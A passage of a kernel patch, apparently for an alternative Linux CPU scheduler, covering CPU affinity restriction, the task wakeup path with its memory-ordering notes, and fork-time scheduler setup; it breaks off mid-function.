++int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	return __set_cpus_allowed_ptr(p, new_mask, 0);
++}
++EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
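++
++/*
++ * Usage sketch (illustrative, names are placeholders): pin a freshly
++ * created kthread to one CPU before waking it:
++ *
++ *	struct task_struct *tsk = kthread_create(fn, data, "worker/%u", cpu);
++ *
++ *	if (!IS_ERR(tsk)) {
++ *		set_cpus_allowed_ptr(tsk, cpumask_of(cpu));
++ *		wake_up_process(tsk);
++ *	}
++ *
++ * (kthread_bind() is the more common helper for this particular case.)
++ */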
++
++/*
++ * Change a given task's CPU affinity to the intersection of its current
++ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
++ * and pointing @p->user_cpus_ptr to a copy of the old mask.
++ * If the resulting mask is empty, leave the affinity unchanged and return
++ * -EINVAL.
++ */
++static int restrict_cpus_allowed_ptr(struct task_struct *p,
++				     struct cpumask *new_mask,
++				     const struct cpumask *subset_mask)
++{
++	struct cpumask *user_mask = NULL;
++	unsigned long irq_flags;
++	raw_spinlock_t *lock;
++	struct rq *rq;
++	int err;
++
++	if (!p->user_cpus_ptr) {
++		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
++		if (!user_mask)
++			return -ENOMEM;
++	}
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
++		err = -EINVAL;
++		goto err_unlock;
++	}
++
++	/*
++	 * We're about to butcher the task affinity, so keep track of what
++	 * the user asked for in case we're able to restore it later on.
++	 */
++	if (user_mask) {
++		cpumask_copy(user_mask, p->cpus_ptr);
++		p->user_cpus_ptr = user_mask;
++	}
++
++	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
++
++err_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	kfree(user_mask);
++	return err;
++}
++
++/*
++ * Restrict the CPU affinity of task @p so that it is a subset of
++ * task_cpu_possible_mask() and point @p->user_cpu_ptr to a copy of the
++ * old affinity mask. If the resulting mask is empty, we warn and walk
++ * up the cpuset hierarchy until we find a suitable mask.
++ */
++void force_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	cpumask_var_t new_mask;
++	const struct cpumask *override_mask = task_cpu_possible_mask(p);
++
++	alloc_cpumask_var(&new_mask, GFP_KERNEL);
++
++	/*
++	 * __migrate_task() can fail silently in the face of concurrent
++	 * offlining of the chosen destination CPU, so take the hotplug
++	 * lock to ensure that the migration succeeds.
++	 */
++	cpus_read_lock();
++	if (!cpumask_available(new_mask))
++		goto out_set_mask;
++
++	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
++		goto out_free_mask;
++
++	/*
++	 * We failed to find a valid subset of the affinity mask for the
++	 * task, so override it based on its cpuset hierarchy.
++	 */
++	cpuset_cpus_allowed(p, new_mask);
++	override_mask = new_mask;
++
++out_set_mask:
++	if (printk_ratelimit()) {
++		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
++				task_pid_nr(p), p->comm,
++				cpumask_pr_args(override_mask));
++	}
++
++	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
++out_free_mask:
++	cpus_read_unlock();
++	free_cpumask_var(new_mask);
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
++
++/*
++ * Restore the affinity of a task @p which was previously restricted by a
++ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
++ * @p->user_cpus_ptr.
++ *
++ * It is the caller's responsibility to serialise this with any calls to
++ * force_compatible_cpus_allowed_ptr(@p).
++ */
++void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = p->user_cpus_ptr;
++	unsigned long flags;
++
++	/*
++	 * Try to restore the old affinity mask. If this fails, then
++	 * we free the mask explicitly to avoid it being inherited across
++	 * a subsequent fork().
++	 */
++	if (!user_mask || !__sched_setaffinity(p, user_mask))
++		return;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	user_mask = clear_user_cpus_ptr(p);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	kfree(user_mask);
++}
++
++#else /* CONFIG_SMP */
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	return 0;
++}
++
++static inline int
++__set_cpus_allowed_ptr(struct task_struct *p,
++		       const struct cpumask *new_mask, u32 flags)
++{
++	return set_cpus_allowed_ptr(p, new_mask);
++}
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return false;
++}
++
++#endif /* !CONFIG_SMP */
++
++static void
++ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq;
++
++	if (!schedstat_enabled())
++		return;
++
++	rq = this_rq();
++
++#ifdef CONFIG_SMP
++	if (cpu == rq->cpu) {
++		__schedstat_inc(rq->ttwu_local);
++		__schedstat_inc(p->stats.nr_wakeups_local);
++	} else {
++		/*
++		 * Alt schedule FW ToDo:
++		 * how to do ttwu_wake_remote
++		 */
++	}
++#endif /* CONFIG_SMP */
++
++	__schedstat_inc(rq->ttwu_count);
++	__schedstat_inc(p->stats.nr_wakeups);
++}
++
++/*
++ * Mark the task runnable and perform wakeup-preemption.
++ */
++static inline void
++ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	check_preempt_curr(rq);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	trace_sched_wakeup(p);
++}
++
++static inline void
++ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	if (p->sched_contributes_to_load)
++		rq->nr_uninterruptible--;
++
++	if (
++#ifdef CONFIG_SMP
++	    !(wake_flags & WF_MIGRATED) &&
++#endif
++	    p->in_iowait) {
++		delayacct_blkio_end(p);
++		atomic_dec(&task_rq(p)->nr_iowait);
++	}
++
++	activate_task(p, rq);
++	ttwu_do_wakeup(rq, p, 0);
++}
++
++/*
++ * Consider @p being inside a wait loop:
++ *
++ *   for (;;) {
++ *      set_current_state(TASK_UNINTERRUPTIBLE);
++ *
++ *      if (CONDITION)
++ *         break;
++ *
++ *      schedule();
++ *   }
++ *   __set_current_state(TASK_RUNNING);
++ *
++ * between set_current_state() and schedule(). In this case @p is still
++ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
++ * an atomic manner.
++ *
++ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
++ * then schedule() must still happen and p->state can be changed to
++ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
++ * need to do a full wakeup with enqueue.
++ *
++ * Returns: %true when the wakeup is done,
++ *          %false otherwise.
++ */
++static int ttwu_runnable(struct task_struct *p, int wake_flags)
++{
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	int ret = 0;
++
++	rq = __task_access_lock(p, &lock);
++	if (task_on_rq_queued(p)) {
++		/* check_preempt_curr() may use rq clock */
++		update_rq_clock(rq);
++		ttwu_do_wakeup(rq, p, wake_flags);
++		ret = 1;
++	}
++	__task_access_unlock(p, lock);
++
++	return ret;
++}
++
++#ifdef CONFIG_SMP
++void sched_ttwu_pending(void *arg)
++{
++	struct llist_node *llist = arg;
++	struct rq *rq = this_rq();
++	struct task_struct *p, *t;
++	struct rq_flags rf;
++
++	if (!llist)
++		return;
++
++	/*
++	 * rq::ttwu_pending is a racy indication of outstanding wakeups.
++	 * Races such that false-negatives are possible, since they
++	 * are shorter lived than false-positives would be.
++	 */
++	WRITE_ONCE(rq->ttwu_pending, 0);
++
++	rq_lock_irqsave(rq, &rf);
++	update_rq_clock(rq);
++
++	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
++		if (WARN_ON_ONCE(p->on_cpu))
++			smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
++			set_task_cpu(p, cpu_of(rq));
++
++		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
++	}
++
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++void send_call_function_single_ipi(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (!set_nr_if_polling(rq->idle))
++		arch_send_call_function_single_ipi(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++/*
++ * Queue a task on the target CPU's wake_list and wake the CPU via IPI if
++ * necessary. The wakee CPU on receipt of the IPI will queue the task
++ * via sched_ttwu_pending() for activation so the wakee incurs the cost
++ * of the wakeup instead of the waker.
++ */
++static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
++
++	WRITE_ONCE(rq->ttwu_pending, 1);
++	__smp_call_single_queue(cpu, &p->wake_entry.llist);
++}
++
++static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
++{
++	/*
++	 * Do not complicate things with the async wake_list while the CPU is
++	 * in hotplug state.
++	 */
++	if (!cpu_active(cpu))
++		return false;
++
++	/* Ensure the task will still be allowed to run on the CPU. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/*
++	 * If the CPU does not share cache, then queue the task on the
++	 * remote rqs wakelist to avoid accessing remote data.
++	 */
++	if (!cpus_share_cache(smp_processor_id(), cpu))
++		return true;
++
++	if (cpu == smp_processor_id())
++		return false;
++
++	/*
++	 * If the wakee cpu is idle, or the task is descheduling and the
++	 * only running task on the CPU, then use the wakelist to offload
++	 * the task activation to the idle (or soon-to-be-idle) CPU as
++	 * the current CPU is likely busy. nr_running is checked to
++	 * avoid unnecessary task stacking.
++	 *
++	 * Note that we can only get here with (wakee) p->on_rq=0,
++	 * p->on_cpu can be whatever, we've done the dequeue, so
++	 * the wakee has been accounted out of ->nr_running.
++	 */
++	if (!cpu_rq(cpu)->nr_running)
++		return true;
++
++	return false;
++}
++
++static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
++		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
++		__ttwu_queue_wakelist(p, cpu, wake_flags);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_if_idle(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	rcu_read_lock();
++
++	if (!is_idle_task(rcu_dereference(rq->curr)))
++		goto out;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (is_idle_task(rq->curr))
++		resched_curr(rq);
++	/* Else CPU is not idle, do nothing here */
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out:
++	rcu_read_unlock();
++}
++
++bool cpus_share_cache(int this_cpu, int that_cpu)
++{
++	if (this_cpu == that_cpu)
++		return true;
++
++	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
++}
++#else /* !CONFIG_SMP */
++
++static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	return false;
++}
++
++#endif /* CONFIG_SMP */
++
++static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (ttwu_queue_wakelist(p, cpu, wake_flags))
++		return;
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++	ttwu_do_activate(rq, p, wake_flags);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Invoked from try_to_wake_up() to check whether the task can be woken up.
++ *
++ * The caller holds p::pi_lock if p != current or has preemption
++ * disabled when p == current.
++ *
++ * The rules of PREEMPT_RT saved_state:
++ *
++ *   The related locking code always holds p::pi_lock when updating
++ *   p::saved_state, which means the code is fully serialized in both cases.
++ *
++ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
++ *   bits are set. This makes it possible to distinguish all wakeup scenarios.
++ */
++static __always_inline
++bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
++{
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
++		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
++			     state != TASK_RTLOCK_WAIT);
++	}
++
++	if (READ_ONCE(p->__state) & state) {
++		*success = 1;
++		return true;
++	}
++
++#ifdef CONFIG_PREEMPT_RT
++	/*
++	 * Saved state preserves the task state across blocking on
++	 * an RT lock.  If the state matches, set p::saved_state to
++	 * TASK_RUNNING, but do not wake the task because it waits
++	 * for a lock wakeup. Also indicate success because from
++	 * the regular waker's point of view this has succeeded.
++	 *
++	 * After acquiring the lock the task will restore p::__state
++	 * from p::saved_state which ensures that the regular
++	 * wakeup is not lost. The restore will also set
++	 * p::saved_state to TASK_RUNNING so any further tests will
++	 * not result in false positives vs. @success
++	 */
++	if (p->saved_state & state) {
++		p->saved_state = TASK_RUNNING;
++		*success = 1;
++	}
++#endif
++	return false;
++}
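++
++/*
++ * Example (editor's illustration): callers choose which sleep states are
++ * eligible via the @state mask that ttwu_state_match() tests, e.g. with
++ * the wrappers defined later in this file:
++ *
++ *   wake_up_state(p, TASK_INTERRUPTIBLE);  // only interruptible sleepers
++ *   wake_up_process(p);                    // TASK_NORMAL: either sleep state
++ */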
++
++/*
++ * Notes on Program-Order guarantees on SMP systems.
++ *
++ *  MIGRATION
++ *
++ * The basic program-order guarantee on SMP systems is that when a task [t]
++ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
++ * execution on its new CPU [c1].
++ *
++ * For migration (of runnable tasks) this is provided by the following means:
++ *
++ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
++ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
++ *     rq(c1)->lock (if not at the same time, then in that order).
++ *  C) LOCK of the rq(c1)->lock scheduling in task
++ *
++ * Transitivity guarantees that B happens after A and C after B.
++ * Note: we only require RCpc transitivity.
++ * Note: the CPU doing B need not be c0 or c1
++ *
++ * Example:
++ *
++ *   CPU0            CPU1            CPU2
++ *
++ *   LOCK rq(0)->lock
++ *   sched-out X
++ *   sched-in Y
++ *   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(0)->lock // orders against CPU0
++ *                                   dequeue X
++ *                                   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(1)->lock
++ *                                   enqueue X
++ *                                   UNLOCK rq(1)->lock
++ *
++ *                   LOCK rq(1)->lock // orders against CPU2
++ *                   sched-out Z
++ *                   sched-in X
++ *                   UNLOCK rq(1)->lock
++ *
++ *
++ *  BLOCKING -- aka. SLEEP + WAKEUP
++ *
++ * For blocking we (obviously) need to provide the same guarantee as for
++ * migration. However the means are completely different as there is no lock
++ * chain to provide order. Instead we do:
++ *
++ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
++ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
++ *
++ * Example:
++ *
++ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
++ *
++ *   LOCK rq(0)->lock LOCK X->pi_lock
++ *   dequeue X
++ *   sched-out X
++ *   smp_store_release(X->on_cpu, 0);
++ *
++ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
++ *                    X->state = WAKING
++ *                    set_task_cpu(X,2)
++ *
++ *                    LOCK rq(2)->lock
++ *                    enqueue X
++ *                    X->state = RUNNING
++ *                    UNLOCK rq(2)->lock
++ *
++ *                                          LOCK rq(2)->lock // orders against CPU1
++ *                                          sched-out Z
++ *                                          sched-in X
++ *                                          UNLOCK rq(2)->lock
++ *
++ *                    UNLOCK X->pi_lock
++ *   UNLOCK rq(0)->lock
++ *
++ *
++ * However, for wakeups there is a second guarantee we must provide, namely we
++ * must observe the state that led to our wakeup. That is, not only must our
++ * task observe its own prior state, it must also observe the stores prior to
++ * its wakeup.
++ *
++ * This means that any means of doing remote wakeups must order the CPU doing
++ * the wakeup against the CPU the task is going to end up running on. This,
++ * however, is already required for the regular Program-Order guarantee above,
++ * since the waking CPU is the one issuing the ACQUIRE (smp_cond_load_acquire).
++ *
++ */
++
++/**
++ * try_to_wake_up - wake up a thread
++ * @p: the thread to be awakened
++ * @state: the mask of task states that can be woken
++ * @wake_flags: wake modifier flags (WF_*)
++ *
++ * Conceptually does:
++ *
++ *   If (@state & @p->state) @p->state = TASK_RUNNING.
++ *
++ * If the task was not queued/runnable, also place it back on a runqueue.
++ *
++ * This function is atomic against schedule() which would dequeue the task.
++ *
++ * It issues a full memory barrier before accessing @p->state, see the comment
++ * with set_current_state().
++ *
++ * Uses p->pi_lock to serialize against concurrent wake-ups.
++ *
++ * Relies on p->pi_lock stabilizing:
++ *  - p->sched_class
++ *  - p->cpus_ptr
++ *  - p->sched_task_group
++ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
++ *
++ * Tries really hard to only take one task_rq(p)->lock for performance.
++ * Takes rq->lock in:
++ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
++ *  - ttwu_queue()       -- new rq, for enqueue of the task;
++ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
++ *
++ * As a consequence we race really badly with just about everything. See the
++ * many memory barriers and their comments for details.
++ *
++ * Return: %true if @p->state changes (an actual wakeup was done),
++ *	   %false otherwise.
++ */
++static int try_to_wake_up(struct task_struct *p, unsigned int state,
++			  int wake_flags)
++{
++	unsigned long flags;
++	int cpu, success = 0;
++
++	preempt_disable();
++	if (p == current) {
++		/*
++		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
++		 * == smp_processor_id()'. Together this means we can special
++		 * case the whole 'p->on_rq && ttwu_runnable()' case below
++		 * without taking any locks.
++		 *
++		 * In particular:
++		 *  - we rely on Program-Order guarantees for all the ordering,
++		 *  - we're serialized against set_special_state() by virtue of
++		 *    it disabling IRQs (this allows not taking ->pi_lock).
++		 */
++		if (!ttwu_state_match(p, state, &success))
++			goto out;
++
++		trace_sched_waking(p);
++		WRITE_ONCE(p->__state, TASK_RUNNING);
++		trace_sched_wakeup(p);
++		goto out;
++	}
++
++	/*
++	 * If we are going to wake up a thread waiting for CONDITION we
++	 * need to ensure that CONDITION=1 done by the caller can not be
++	 * reordered with p->state check below. This pairs with smp_store_mb()
++	 * in set_current_state() that the waiting thread does.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	smp_mb__after_spinlock();
++	if (!ttwu_state_match(p, state, &success))
++		goto unlock;
++
++	trace_sched_waking(p);
++
++	/*
++	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
++	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
++	 * in smp_cond_load_acquire() below.
++	 *
++	 * sched_ttwu_pending()			try_to_wake_up()
++	 *   STORE p->on_rq = 1			  LOAD p->state
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   UNLOCK rq->lock
++	 *
++	 * [task p]
++	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * A similar smp_rmb() lives in __task_needs_rq_lock().
++	 */
++	smp_rmb();
++	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
++		goto unlock;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
++	 * possible to, falsely, observe p->on_cpu == 0.
++	 *
++	 * One must be running (->on_cpu == 1) in order to remove oneself
++	 * from the runqueue.
++	 *
++	 * __schedule() (switch to task 'p')	try_to_wake_up()
++	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (put 'p' to sleep)
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
++	 * schedule()'s deactivate_task() has 'happened' and p will no longer
++	 * care about its own p->state. See the comment in __schedule().
++	 */
++	smp_acquire__after_ctrl_dep();
++
++	/*
++	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
++	 * == 0), which means we need to do an enqueue. Change p->state to
++	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
++	 * enqueue, such as ttwu_queue_wakelist().
++	 */
++	WRITE_ONCE(p->__state, TASK_WAKING);
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, consider queueing p on the remote CPU's wake_list
++	 * which potentially sends an IPI instead of spinning on p->on_cpu to
++	 * let the waker make forward progress. This is safe because IRQs are
++	 * disabled and the IPI will deliver after on_cpu is cleared.
++	 *
++	 * Ensure we load task_cpu(p) after p->on_cpu:
++	 *
++	 * set_task_cpu(p, cpu);
++	 *   STORE p->cpu = @cpu
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock
++	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
++	 *   STORE p->on_cpu = 1                LOAD p->cpu
++	 *
++	 * to ensure we observe the correct CPU on which the task is currently
++	 * scheduling.
++	 */
++	if (smp_load_acquire(&p->on_cpu) &&
++	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
++		goto unlock;
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, wait until it's done referencing the task.
++	 *
++	 * Pairs with the smp_store_release() in finish_task().
++	 *
++	 * This ensures that tasks getting woken will be fully ordered against
++	 * their previous state and preserve Program Order.
++	 */
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++	sched_task_ttwu(p);
++
++	cpu = select_task_rq(p);
++
++	if (cpu != task_cpu(p)) {
++		if (p->in_iowait) {
++			delayacct_blkio_end(p);
++			atomic_dec(&task_rq(p)->nr_iowait);
++		}
++
++		wake_flags |= WF_MIGRATED;
++		psi_ttwu_dequeue(p);
++		set_task_cpu(p, cpu);
++	}
++#else
++	cpu = task_cpu(p);
++#endif /* CONFIG_SMP */
++
++	ttwu_queue(p, cpu, wake_flags);
++unlock:
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++out:
++	if (success)
++		ttwu_stat(p, task_cpu(p), wake_flags);
++	preempt_enable();
++
++	return success;
++}
++
++static bool __task_needs_rq_lock(struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
++	 * the task is blocked. Make sure to check @state since ttwu() can drop
++	 * locks at the end, see ttwu_queue_wakelist().
++	 */
++	if (state == TASK_RUNNING || state == TASK_WAKING)
++		return true;
++
++	/*
++	 * Ensure we load p->on_rq after p->__state, otherwise it would be
++	 * possible to, falsely, observe p->on_rq == 0.
++	 *
++	 * See try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	if (p->on_rq)
++		return true;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure the task has finished __schedule() and will not be referenced
++	 * anymore. Again, see try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++#endif
++
++	return false;
++}
++
++/**
++ * task_call_func - Invoke a function on task in fixed state
++ * @p: Process for which the function is to be invoked, can be @current.
++ * @func: Function to invoke.
++ * @arg: Argument to function.
++ *
++ * Fix the task in its current state by avoiding wakeups and/or rq operations
++ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
++ * to work out what the state is, if required.  Given that @func can be invoked
++ * with a runqueue lock held, it had better be quite lightweight.
++ *
++ * Returns:
++ *   Whatever @func returns
++ */
++int task_call_func(struct task_struct *p, task_call_f func, void *arg)
++{
++	struct rq *rq = NULL;
++	struct rq_flags rf;
++	int ret;
++
++	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
++
++	if (__task_needs_rq_lock(p))
++		rq = __task_rq_lock(p, &rf);
++
++	/*
++	 * At this point the task is pinned; either:
++	 *  - blocked and we're holding off wakeups      (pi->lock)
++	 *  - woken, and we're holding off enqueue       (rq->lock)
++	 *  - queued, and we're holding off schedule     (rq->lock)
++	 *  - running, and we're holding off de-schedule (rq->lock)
++	 *
++	 * The called function (@func) can use: task_curr(), p->on_rq and
++	 * p->__state to differentiate between these states.
++	 */
++	ret = func(p, arg);
++
++	if (rq)
++		__task_rq_unlock(rq, &rf);
++
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
++	return ret;
++}
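++
++/*
++ * Usage sketch (editor's illustration; get_state_cb is a made-up name,
++ * not a kernel symbol): sample a task's state while the task is pinned:
++ *
++ *   static int get_state_cb(struct task_struct *p, void *arg)
++ *   {
++ *           *(unsigned int *)arg = READ_ONCE(p->__state);
++ *           return 0;
++ *   }
++ *
++ *   unsigned int state;
++ *   task_call_func(p, get_state_cb, &state);
++ */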
++
++/**
++ * cpu_curr_snapshot - Return a snapshot of the currently running task
++ * @cpu: The CPU on which to snapshot the task.
++ *
++ * Returns the task_struct pointer of the task "currently" running on
++ * the specified CPU.  If the same task is running on that CPU throughout,
++ * the return value will be a pointer to that task's task_struct structure.
++ * If the CPU did any context switches even vaguely concurrently with the
++ * execution of this function, the return value will be a pointer to the
++ * task_struct structure of a randomly chosen task that was running on
++ * that CPU somewhere around the time that this function was executing.
++ *
++ * If the specified CPU was offline, the return value is whatever it
++ * is, perhaps a pointer to the task_struct structure of that CPU's idle
++ * task, but there is no guarantee.  Callers wishing a useful return
++ * value must take some action to ensure that the specified CPU remains
++ * online throughout.
++ *
++ * This function executes full memory barriers before and after fetching
++ * the pointer, which permits the caller to confine this function's fetch
++ * with respect to the caller's accesses to other shared variables.
++ */
++struct task_struct *cpu_curr_snapshot(int cpu)
++{
++	struct task_struct *t;
++
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	t = rcu_dereference(cpu_curr(cpu));
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	return t;
++}
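++
++/*
++ * Usage sketch (editor's illustration): a caller that wants a meaningful
++ * snapshot keeps the CPU online around the call, for example:
++ *
++ *   cpus_read_lock();
++ *   t = cpu_curr_snapshot(cpu);
++ *   // inspect t under the caller's own synchronization
++ *   cpus_read_unlock();
++ */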
++
++/**
++ * wake_up_process - Wake up a specific process
++ * @p: The process to be woken up.
++ *
++ * Attempt to wake up the nominated process and move it to the set of runnable
++ * processes.
++ *
++ * Return: 1 if the process was woken up, 0 if it was already running.
++ *
++ * This function executes a full memory barrier before accessing the task state.
++ */
++int wake_up_process(struct task_struct *p)
++{
++	return try_to_wake_up(p, TASK_NORMAL, 0);
++}
++EXPORT_SYMBOL(wake_up_process);
++
++int wake_up_state(struct task_struct *p, unsigned int state)
++{
++	return try_to_wake_up(p, state, 0);
++}
++
++/*
++ * Perform scheduler related setup for a newly forked process p.
++ * p is forked by current.
++ *
++ * __sched_fork() is basic setup used by init_idle() too:
++ */
++static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	p->on_rq			= 0;
++	p->on_cpu			= 0;
++	p->utime			= 0;
++	p->stime			= 0;
++	p->sched_time			= 0;
++
++#ifdef CONFIG_SCHEDSTATS
++	/* Even if schedstat is disabled, there should not be garbage */
++	memset(&p->stats, 0, sizeof(p->stats));
++#endif
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++	INIT_HLIST_HEAD(&p->preempt_notifiers);
++#endif
++
++#ifdef CONFIG_COMPACTION
++	p->capture_control = NULL;
++#endif
++#ifdef CONFIG_SMP
++	p->wake_entry.u_flags = CSD_TYPE_TTWU;
++#endif
++}
++
++/*
++ * fork()/clone()-time setup:
++ */
++int sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	__sched_fork(clone_flags, p);
++	/*
++	 * We mark the process as NEW here. This guarantees that
++	 * nobody will actually run it, and a signal or other external
++	 * event cannot wake it up and insert it on the runqueue either.
++	 */
++	p->__state = TASK_NEW;
++
++	/*
++	 * Make sure we do not leak PI boosting priority to the child.
++	 */
++	p->prio = current->normal_prio;
++
++	/*
++	 * Revert to default priority/policy on fork if requested.
++	 */
++	if (unlikely(p->sched_reset_on_fork)) {
++		if (task_has_rt_policy(p)) {
++			p->policy = SCHED_NORMAL;
++			p->static_prio = NICE_TO_PRIO(0);
++			p->rt_priority = 0;
++		} else if (PRIO_TO_NICE(p->static_prio) < 0)
++			p->static_prio = NICE_TO_PRIO(0);
++
++		p->prio = p->normal_prio = p->static_prio;
++
++		/*
++		 * We don't need the reset flag anymore after the fork. It has
++		 * fulfilled its duty:
++		 */
++		p->sched_reset_on_fork = 0;
++	}
++
++#ifdef CONFIG_SCHED_INFO
++	if (unlikely(sched_info_on()))
++		memset(&p->sched_info, 0, sizeof(p->sched_info));
++#endif
++	init_task_preempt_count(p);
++
++	return 0;
++}
++
++void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	/*
++	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
++	 * required yet, but lockdep gets upset if rules are violated.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	/*
++	 * Share the timeslice between parent and child, thus the
++	 * total amount of pending timeslices in the system doesn't change,
++	 * resulting in more scheduling fairness.
++	 */
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	rq->curr->time_slice /= 2;
